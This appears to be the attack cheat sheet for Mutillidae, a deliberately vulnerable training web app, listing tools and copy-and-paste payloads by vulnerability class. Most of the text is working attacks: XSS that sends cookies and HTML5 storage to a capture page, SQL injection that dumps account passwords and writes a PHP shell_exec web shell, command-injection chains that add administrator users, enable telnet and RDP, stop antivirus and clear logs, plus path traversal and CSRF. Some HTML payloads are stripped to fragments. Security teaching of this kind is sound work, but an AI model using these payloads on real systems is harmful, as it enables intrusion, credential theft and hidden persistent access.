Topics Installation XAMPP VM Samurai - Bootable DVD Samurai Installation Custom Bootable DVD Mutillidae Uses 1. Teach web developers how to write secure code 2. Teach web developers what exploits may be possible 3. Teach web developers insecure coding patterns 4. Demonstrate to DBAs what exploits may be possible 5. Demonstrate to management what exploits may be possible -------------------- Demonstration -------------------- Pen Testing Methodology (CEH version) Recon Scanning (Discover hosts, ports, services, internal network map, Enumerating user names) Gaining Access Maintaining Access Cover Tracks ---------------------------------------- BEEF Framework ---------------------------------------- Put this text into the add-to-my-blog as a blog entry: Most developers do not understand how dangerous XSS can be ---------------------------------------- Grendel Scan ---------------------------------------- Backtrack 5: Change directory to /pentest/web/grendel-scan/. Run to pull up GUI. Provide target URL. Provide non-existent output directory. Configure plug-ins. Run scan. When scan is done, click terminate scan. Report will be generated. ---------------------------------------- RatProxy ---------------------------------------- To scan generally: Backtrack 5: Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d -p 8088 -lextscgj Generate Report: ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html To find XSS: Backtrack 5: Capture Data: /usr/bin/ratproxy -w ~/pentests/scan-results/mutillidae/ratproxy/20110115.log -v ~/pentests/scan-results/mutillidae/ratproxy -d -p 8088 -x Generate Report: ~/pentests/scan-results/mutillidae/ratproxy/20110115.log > mut-rat.html ---------------------------------------- SQLMAP ---------------------------------------- *** CONFIRMED! *** python --url="" --data="author=6C57C4B5-B341-4539-977B-7ACB9D42985A&view-someones-blog-php-submit-button=View+Blog+Entries" --level=1 --beep --dump ---------------------------------------- HTML 5 - Injecting XSS into JSON ---------------------------------------- Page: pen-test-tool-lookup.php Beginner: Pop up an alert box to show injection worked Unencoded: "}} );alert(1);// Complete Injection: "}} )%3balert(1)%3b// Prefix: "}} )%3b Payload: alert(1)%3b Suffix: // Copy and Paste: "}} )%3balert(1)%3b// Intermediate: Steal cookie with redirection Unencoded:"}} );document.location="http://localhost/mutillidae/capture-data.php?cookie=" + document.cookie;// Prefix:"}} )%3b Payload:document.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b Suffix:// Complete Injection: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b// Copy and Paste: "}} )%3bdocument.location%3d%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3b// Professional: Steal cookies with XHR injection -------------------------------------------------------------------------------- Generic XHR using GET and XMLHttpRequest to steal cookies - prefix and suffix as neccesary - This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well. NOTE: During Reconnassaince, study your target to determine what kind of browser they have so the scripts can be tailored and testing for those browsers. -------------------------------------------------------------------------------- This is a "UDP-style GET". We fire and forget but cannot know if succeeded or failed. Perfect for using against savvy users. Copy and Paste: -------------------------------------- URL Encoded Version -------------------------------------- Prefix: "}} )%3b Payload: var+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function() Suffix: // Complete Injection: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function() Copy and Paste: "}} )%3bvar+lXMLHTTP%3btry%7b+var+lAction+%3d+%22http%3a%2f%2flocalhost%2fmutillidae%2fcapture-data.php%3fcookie%3d%22+%2b+document.cookie%3blXMLHTTP+%3d+new+XMLHttpRequest()%3b+lXMLHTTP.onreadystatechange+%3d+function() -------------------------------------------------------------------------------- HTML 5 - Local and session storage - setting values -------------------------------------------------------------------------------- Setting Test Values for HTML5 Storage // You can use these statements to set some test values. localStorage.setItem("key1","value1"); localStorage.setItem("key2","value2"); sessionStorage.setItem("key1","value1"); sessionStorage.setItem("key2","value2"); -------------------------------------------------------------------------------- HTML 5 - Local and session storage - Reading values -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Reading current HTML5 storage from local browser -------------------------------------------------------------------------------- Copy and Paste: // JavaScript Alert Box Method // window.document.write method Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY DANGER: DONT MOUSEOVER // Fireug console.log() or console.debug() method - // NOTE: This version must be executed in the Firebug console. The script tags are not needed. try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;i localStorage.setItem("AccountNumber","123456"); sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3"); sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr"); sessionStorage.setItem("CurrentlyLoggedInUser","1233456789"); Copy and Paste script to add values - TESTED SUCCESSFULLY Copy and Paste script to read values (Alert box version) Copy and Paste both scripts (Cross Site Scripting version - Reflected) - TESTED SUCCESSFULLY Copy and Paste both scripts (Cross Site Scripting version - Persistent) - TESTED SUCCESSFULLY NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database. Copy and Paste both scripts (DOM injection version) - TESTED SUCCESSFULLY DANGER: DONT MOUSEOVER Copy and Paste both scripts (Firebug console version) - TESTED SUCCESSFULLY try{localStorage.setItem("AccountNumber","789456");sessionStorage.setItem("EnterpriseSelfDestructSequence","A1B2C3");sessionStorage.setItem("SessionID","japurhgnalbjdgfaljkfr");sessionStorage.setItem("CurrentlyLoggedInUser","1233456789");}catch(e){alert(e.message);}try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;ilocalStorage.setItem("NewSessionToken","This was set by a XSS."); var node=window.document.getElementById("idSessionStorageTableBody"); while(node.hasChildNodes()){node.removeChild(node.firstChild)}; init(); -------------------------------------------------------------------------------- HTML 5 - Local and session storage - Altering values -------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------- Over-writting Storage (Possible Session Fixation) - Set or change current HTML5 values in own browser ---------------------------------------------------------------------------------------------- Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY (first script reads, second script overwrites, thrid script reads again) try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;iDANGER: DONT MOUSEOVER ---------------------------------------------------------------------------------------------- Over-writing Storage (Possible Session Fixation) - Set or change another users HTML5 values ---------------------------------------------------------------------------------------------- Example JavaScript Refelcted (First Order) Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database. DOM injected Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): DANGER: WHATEVER YOU DO, FOR CRYING OUTLOUD PLEEAASSEEEE DONT MOUSEOVER -------------------------------------------------------------------------------- HTML 5 - Local and session storage - Deleting values -------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------- Deleting own HTML5 Storage ---------------------------------------------------------------------------------------------- Copy and Paste all three scripts (Firebug console version) - TESTED SUCCESSFULLY (first script reads, second script deletes, thrid script reads again) try{var m = "";var l = window.localStorage;var s = window.sessionStorage;for(i=0;iDANGER: DONT MOUSEOVER ---------------------------------------------------------------------------------------------- Deleting another users HTML5 Storage ---------------------------------------------------------------------------------------------- Example JavaScript Refelcted (First Order) Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database. DOM injected Cross Site Script - TESTED SUCCESSFULLY Copy and Paste all three cross site scripts (alert box version) (first script reads, second script overwrites, thrid script reads again): DANGER: WHATEVER YOU DO, FOR CRYING OUTLOUD PLEEAASSEEEE DONT MOUSEOVER -------------------------------------------------------------------------------- Deleting values to HTML5 Storage and re-displaying page - PRO VERSION -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- HTML 5 - Local and session storage - Stealing values -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Stealing another users HTML5 Storage: Testing -------------------------------------------------------------------------------- Script to test stealing Local Storage. Inject this into a cross-site script vulneraility. Add a prefix and suffix as neccesary. // XSS to steal local storage and session storage Copy and Paste: -------------------------------------------------------------------------------- Steal HTML5 storage with redirection: Intermediate -------------------------------------------------------------------------------- Copy and Paste - Reflected Cross Site Script - TESTED SUCCESSFULLY Copy and Paste - Persistent Cross Site Script - TESTED SUCCESSFULLY NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database. -------------------------------------------------------------------------------- Steal HTML5 storage with XHR injection: Professional -------------------------------------------------------------------------------- Generic XHR using GET and XMLHttpRequest to steal cookies - prefix and suffix as neccesary - This is optimized for Firefox which has XMLHttpRequest. Some newer IE will as well. NOTE: During Reconnassaince, study your target to determine what kind of browser they have so the scripts can be tailored and testing for those browsers. -------------------------------------------------------------------------------- This is a "UDP-style GET". We fire and forget but cannot know if succeeded or failed. Perfect for using against savvy users. Collect the HTML5 storage first, then send the information to a capture page. Copy and Paste Reflected Cross Site Script - TESTED SUCCESSFULLY Copy and Paste Peristent (Stored, Second Order) Cross Site Script - TESTED SUCCESSFULLY NOTE: This version "MySQL escapes" the "\n" new-line character by doubling up the "\" character because "\n" means new-line in MySQL and this is going to be inserted into the database. Copy and Paste DOM injected Cross Site Script - THIS NEEDS WORK - Causes SQL errors DANGER: WHATEVER YOU DO, PLEEAASSEEEE DONT MOUSEOVER ------------------------- Command Injection ------------------------- Page: dns-lookup.php Recon: Discover available functionality using provided help Windows XP: && help Linux: && --help Linux: && man Recon: Determine current directory Windows XP: && dir Linux: && pwd Recon: Chain commands to discover driectory structure Windows XP: && cd ../../.. && dir Linux: && cd ../../.. && ls -l Recon: Get a list of offerings provided by the "net.exe" program Windows XP: && net Recon: Get a list of services that can be started or stopped Windows XP: && net start Windows XP: && net stop Scanning: Get machine network settings, hostname, DNS servers, subnet mask, etc. Windows XP: && ipconfig /all Linux: && ifconfig Scanning: Discover hosts on network Windows XP: && ping -n 1 Linux: && ping -c 1 Scanning: Enumerate Current user Windows XP: && set Linux: && whoami Scanning: Enumerate computers, users, groups, AD computers, AD users, AD groups Windows XP: && net view [/domain] Windows XP: && net user [/domain] Windows XP: && net localgroup [/domain] Gaining Access: Add user Windows XP: && net user /add Linux: useradd Gaining Access: Delete user Windows XP: && net user /delete Maintain Access: Get Windows Service Names Windows: sc query Maintain Access: kill AV net stop Maintain Access: kill firewall Windows XP SP3: net stop netsvcs Maintain Access: Kill AV/protective services or open backdoor services Windows XP: net stop Windows XP: && net start telnet Windows XP: && net stop telnet Cover Tracks: Clear logs Windows XP: && wevtutil cl Convering Tracks: Database Expolits via Command Injection Linux (Samurai):; mysql �user=root �password=samurai �execute=�DROP TABLE accounts� owasp10 Recon: Explore Database Files Windows XP: && cd c:/xampp/mysql && dir ------------------------------------------------------------------------------------------------------------ Command Injection: Enable Windows Telnet Service (Windows XP SP3) ------------------------------------------------------------------------------------------------------------ NOTE: Similar to Meterpreter run gettelnet List all services (sc query state= all) whatever && sc query state= all Check if service is running (sc query tlntsvr) whatever && sc query tlntsvr Configure telnet service to "demand" (sc config tlntsvr start= demand) whatever && sc config tlntsvr start= demand Start tlntsvr service (sc start tlntsvr) whatever && sc start tlntsvr Add user (net user /add) whatever && net user /add Add Telnet users group (net localgroup TelnetClients /add) whatever && net localgroup TelnetClients /add Add users to Administrators group (net localgroup Administrators /add) whatever && net localgroup Administrators /add Add Telnet user to group (net localgroup TelnetClients /add) whatever && net localgroup TelnetClients /add Allow firewall access (netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=) whatever && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses= ---------------------------- One combined injection: ---------------------------- whatever && sc config tlntsvr start= demand && sc start tlntsvr && net user root toor /add && net localgroup TelnetClients /add && net localgroup Administrators root /add && net localgroup TelnetClients root /add && netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses= ------------------------------------------------------------------------------------------------------------ Command Injection: Enable Windows XP SP3 and similar Remote Desktop Terminal Service ------------------------------------------------------------------------------------------------------------ Check if service running (sc query termservice) Configure service from "disabled" to "manual"(sc config termservice start= demand) Start service (sc start termservice) Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v fdenytsconnections /t reg_dword /d 0 /f) Enable Terminal Services (reg add "hklm\system\currentcontrolset\control\terminalserver" /v TSEnabled /t reg_dword /d 1 /f) Check if service listening (netstat -na | find "3389") Add user (net user /add) Add user to group (net localgroup "Remote Desktop Users" /add) Configure firewall to allow RDP (netsh firewall set service type=remotedesktop mode=enable scope=custom addresses=) ------------------------- SQL Injection ------------------------- Recon: Returns a string that indicates the MySQL server version Page: user-info.php Field: Username Value: ' union select null,VERSION() AS username,null,null -- ' union select null,null,null,version() -- Recon: Returns a string that indicates the current database name Page: user-info.php Field: Username Value: ' union select null,DATABASE() AS username,null,null -- Recon: Returns a string that indicates the current database username Page: user-info.php Field: Username Value: ' union select null,USER() AS username,null,null -- Recon: Extract table names from database Page: user-info.php Field: Username ' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES-- Recon: Extract table columns from database using a single field Page: user-info.php Field: Username Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS-- Recon: Extract views from database (Doesnt work in MySQL 5.1.8) Page: user-info.php Field: Username Value: ' union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS-- Recon: Extract triggers from database Page: user-info.php Field: Username Value: ' union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS-- Recon: Extract routines/procs from database Page: user-info.php Field: Username Value: ' union select null,concat_ws('.', routine_schema, routine_name, '(', routine_type, ')') AS username,null,null from INFORMATION_SCHEMA.ROUTINES-- Recon: Extract metadata from database Page: user-info.php Field: Username Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS union select null,concat_ws('.', routine_schema, routine_name, routine_type, routine_body) AS username,null,null from INFORMATION_SCHEMA.ROUTINES union select null,concat_ws('.', table_schema, table_name, view_definition) AS username,null,null from INFORMATION_SCHEMA.VIEWS union select null,concat_ws('.', trigger_schema, trigger_name) AS username,null,null from INFORMATION_SCHEMA.TRIGGERS-- Recon/Scanning: Get specifications on database software Page: user-info.php Field: Username Value: ' union select null, database(), current_user(), version() -- Gaining Access: Extract passwords from user table Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts -- Maintaining Access: Covering Tracks: Page: login.php Gaining Access: Using SQL Injection ' or 1=1 -- Inserting new user using insert injection to bypass any protections. This example inserts a cross site script. Page: Register.php Field: Username backdoor','password','') -- Note: Kind of pointless but still fun Using advanced techniques: Select Concat Char Page: user-info.php This allows injection to select arbitrary text. This can be useful to bypass filters and WAFs. ' UNION ALL SELECT null,CONCAT(CHAR(112, 97, 115, 115, 119, 111, 114, 100)),null,null -- Using advanced techniques: Select Using IFNULL to search for columns Page: user-info.php ' UNION ALL SELECT null,IFNULL(CAST(username AS CHAR),CHAR(32)),IFNULL(CAST(password AS CHAR),CHAR(32)),null FROM accounts -- Using advanced techniques: Open files on target operating system Page: user-info.php Field: username Values: ' union select null, LOAD_FILE('../README') AS username, null, null-- ' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null-- ' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null-- ' union select null, LOAD_FILE('mysql_error.log'), null, null-- ' union select null, LOAD_FILE('..\\..\\..\\htdocs\\mutillidae\\index.php'), null, null-- Using advanced techniques: Writing files to operating system Page: user-info.php Field: username Values: ' union select null,null,null,'
Please enter system command
";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?>' INTO DUMPFILE '..\\..\\htdocs\\mutillidae\\backdoor.php' --
Please enter system command
"; echo shell_exec($_REQUEST["pCommand"]); echo ""; ?>
Please enter system command
";echo shell_exec($_REQUEST["pCommand"]);echo ""; ?> Using advanced techniques: Insert Injection Technique: SQL Insert Injection Page: add-to-your-blog.php Field: blog Value: BARK','2003-12-31 01:02:03') -- -------------------------------------------------- Blind SQL Injection -------------------------------------------------- Recon: Blind SQL Injection/Brute Forcing values ' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null -- ' union select null, null, null, IF(((SELECT count(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_name = 'user') > 0), sleep(5), sleep(0)) -- ' union Select null, case current_user() when 'root@localhost' THEN sleep(5) ELSE sleep(0) END, null, null -- ' union Select null, sleep(5) -- Page: login.php Technique: Blind SQL Injection - Timing Field: username Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null -- Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1 Page: login.php Technique: Blind SQL Injection - True and False Values Field: username True Value (Using Proxy): ' or 1=1 -- False Value (Using Proxy): ' and 1=0 -- Examine responses to see if they are different ------------------------------------------------------------------------------------------ Broken Authentication and Session Management - Escalating privileges ------------------------------------------------------------------------------------------ Gaining Access: Using insecure client-side authentication tokens Page: Any page Tool: Web Developer Toolbar Note what cookies the site has by default Create a test account Login using test account Check what cookies the site has after authentication Logout Verify auth cookies are gone or get rid of them Create a new cookie based on the original auth cookie, but with different value Gaining Access: Using insecure client-side authentication tokens Page: Any page Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1) Note what cookies the site has by default Create a test account Login using test account Check what cookies the site has after authentication Differential Analysis: Change the value of the original auth cookie Work backwards until admin account is found ------------------------------------------------------------------------------------------ Broken Authentication and Session Management - Bypass Authorization Control ------------------------------------------------------------------------------------------ Gaining Access: Using SQL injection Page: login.php Field: Username Value: ' or 1=1 -- Gaining Access: Using SQL injection Page: login.php Field: Username Value: ' -- ------------------------------------------------------------ Insecure Direct Object Reference - Accessing system files ------------------------------------------------------------ Step 1: Recon: Obtain list of files Possible Technique: Use command injection Page: dns-lookup.php Value (Windows): && dir /w Value (Linux): && pwd && ls -l Possible Techniques: Use robots.txt Possible Techniques: Use directory browsing Possible Techniques: Use directory brute-forcing Step 2: Gaining Access: Retrive system files Page: source-viewer.php Technique: Use proxy to change value, Use parent directory to bypass jails Tool: Tamper Data, Paros, WebScarab, Burp Field: phpfile Value: , ../../../boot.ini, ..\..\..\WINDOW\System32\drivers\etc\hosts, ../../../etc/passwd ----------------------------- Cross Site Scripting ----------------------------- Page: add-to-your-blog.php Field: blog contents Value: HTTP Header: Browser User Agent String Tool: User Agent Switcher Value:

Sorry, please login again



Defense: Encoding Defense When certain tokens allowed: Mapping Page: add-to-your-blog.php Field: blog contents Tool: Burp-Suite Value:
Were sorry. This session has expired.

Please login again.
Defense: Encoding Page: add-to-your-blog Field: blog contents Value: ----------------------------- Cross Site Request Forgery ----------------------------- Page: add-to-your-blog, view-someones-blog Tool: HTTPFox (to view forged request) Force someone to add a blog without consent:
Dancing with the stars results Force someone to log out: How to improve your Facebook status Force someone to add a blog without consent (Credit: Udit Bajaj): CECS 566 Test 2 solutions! Force someone to register without their consent:
Hello World Force someone to register without their consent: Here is the same example using XHR rather than the "onmouseover" event: ------------------------------------------------------------------------------------ Sample to perform cross-site script on the Add to Your Blog that will perform CSRF on the User Poll ------------------------------------------------------------------------------------ Vote for nmap. I know you will. ------------------------- Security Misconfiguration ------------------------- Improper Error Handling: Page: login.php Field: username Value: Result: Error gives SQL exception --------------------------------- Insecure Direct Object References --------------------------------- Page: source-viewer.php Field: phpfile Value (Windows XP): c:\boot.ini, C:\WINDOWS\system32\drivers\etc\hosts Tool: netcat, tamper data, paros, webscarab, burp Use netcat or hackbar to send in post data: phpfile=c:\boot.ini&source-file-viewer-php-submit-button="View File" phpfile=C:\WINDOWS\system32\drivers\etc\hosts&source-file-viewer-php-submit-button="View File" Alternative: Use proxy to change value of phpfile to system file --------------------------------- Insecure Cryptographic Storage --------------------------------- Extract passwords from system: Page: user-info.php Technique: Direct SQL injection Field: username Value: ' or 1=1 -- Page: user-info.php Technique: Indirect SQL injection Field: username Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts -- Page: login.php Technique: Blind SQL Injection Field: username Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null -- Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1 --------------------------------- Failure to Restrict URL Access --------------------------------- Page: robots.txt Technique: Security Misconfiguration, Design Flaw Recon: List Files Technique: Shoulder surfing Recon: List Files Technique: Steal Bookmarks Recon: List Files Technique: Dump client cache Recon: List Files Page: dns-lookup.php Technique: Command Injection Field: hostname Scanning: View Source Code Page: dns-lookup.php Technique: Command Injection Field: hostname Value: && type (then see source because PHP code doesnt show in browser) Gaining Access: View restricted page Page: Any (i.e. - http://localhost/mutillidae/, http://localhost/mutillidae/passwords/accounts.txt) Technique: Type in URL ------------------------------------------ Insufficient Transport Layer Protection ------------------------------------------ Gaining Access: Intercept clear text credentials Page: login.php Tool: Use any proxy (Paros, Tamper Data) or sniffer (Wireshark, TCPDump, Snort, etc.) Fields: Username and Password ------------------------------------------ Unvalidated redirects and forwards ------------------------------------------ Page: credits.php Technique: Phishing Tool: Any proxy, netcat, hackbar Field: forwardurl Value: any URI Page: credits.php Technique: Horizontal Application Attack, Restricted URL Access, Authroization Bypass Tool: Hackbar, anything that can change the URL query parameters Field: forwardurl Value: http://localhost/xampp -------------------------------------------- Information Asset Protection - Cache Control -------------------------------------------- Recon: Grab leaked company information Page: index.php, all Technique: View local cache Tool: Firefox about:cache, Internet Explorer Tools-->Options-->General Tab-->Browser History Settings-->View Files Defenses: cache control headers -------------------------------------------- Information Asset Protection - Framing -------------------------------------------- Gaining Access: Cross Frame Scripting/Click-jacking Page: index.php, all Tecnique: Frame page, use overlay Tool (to view defenses): HTTPFox Defense: x-frame-options, frame busters ---------------------------------------------- Information Asset Protection - Leaked Comments ---------------------------------------------- Page: index.php Technique: View Source Tool: View Source, Sniffer (Wireshark), HTTPFox Defense: Use framework comment tags to trap comments on the app server ---------------------------------------------- Log Injection ---------------------------------------------- Page: show-log.php Technique: Figure out what fields are logged, which of those the client controls, and inject those fields with SQL injection, HTML injection, XSS, XSRF, etc. Defense: Logs should be output encoded -------------------------------------------------------------------------------- Generic XHR to steal cookies (prefix and suffix as necessary) --------------------------------------------------------------------------------